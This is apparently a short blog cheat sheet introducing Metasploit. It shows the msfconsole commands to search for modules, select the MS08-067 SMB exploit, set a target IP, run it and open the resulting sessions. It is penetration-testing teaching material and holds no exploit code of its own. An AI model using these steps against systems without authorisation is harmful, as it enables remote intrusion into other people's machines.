MetaSPLOIT INTRO CHEAT SHEET

Posted on by hecsan9634

Metasploit is a powerful tool for penetration testing and vulnerability management. It allows you to discover, exploit, and validate vulnerabilities in a controlled environment.

  1. First, download and install Metasploit from the official website (https://www.metasploit.com/).
  2. Open the Metasploit console by running the command “msfconsole” in your terminal.
  3. Once the console is open, use the command “search [term]” to search for a specific exploit or module. For example, “search windows” will search for all modules related to Windows.
  4. To use a specific exploit or module, use the command “use [module name]”. For example, “use exploit/windows/smb/ms08_067_netapi” will select the MS08-067 exploit for use.
  5. To see options for the selected module, use the command “show options”. This will display options such as target IP and payload.
  6. Set the options for the module using the command “set [option] [value]”. For example, “set RHOST 192.168.1.100” will set the target IP to 192.168.1.100.
  7. Once the options are set, use the command “exploit” to run the module.
  8. If the exploit is successful, you will have access to the target system. Use the command “sessions -l” to list all active sessions and “sessions -i [session number]” to interact with a specific session.

Metasploit is a powerful tool that can be used to discover, exploit, and validate vulnerabilities in a controlled environment. The above steps should provide a good starting point for using Metasploit, but it is recommended to read through the documentation and gain more experience with the tool.

msfconsole

Searching for a specific exploit or module

search windows

In the above example, we used the command search windows to search for all modules related to Windows.

Using a specific exploit or module

 use exploit/windows/smb/ms08_067_netapi

In the above example, we used the command use exploit/windows/smb/ms08_067_netapi to select the MS08-067 exploit for use.

Viewing options for a module

msf exploit(ms08_067_netapi) > show options

In the above example, we used the command show options to display the options for the selected module.

Setting options for a module

msf exploit(ms08_067_netapi) > set RHOST 192.168.1.100

In the above example, we used the command set RHOST 192.168.1.100 to set the target IP to 192.168.1.100.

Running an exploit

msf exploit(ms08_067_netapi) > exploit

In the above example, we used the command exploit to run the module. If the exploit is successful, we will have access to the target system. We can use the command sessions -l to list all active sessions and sessions -i [session number] to interact with a specific session.

This is all for now!

PEACE!

Published by hecsan9634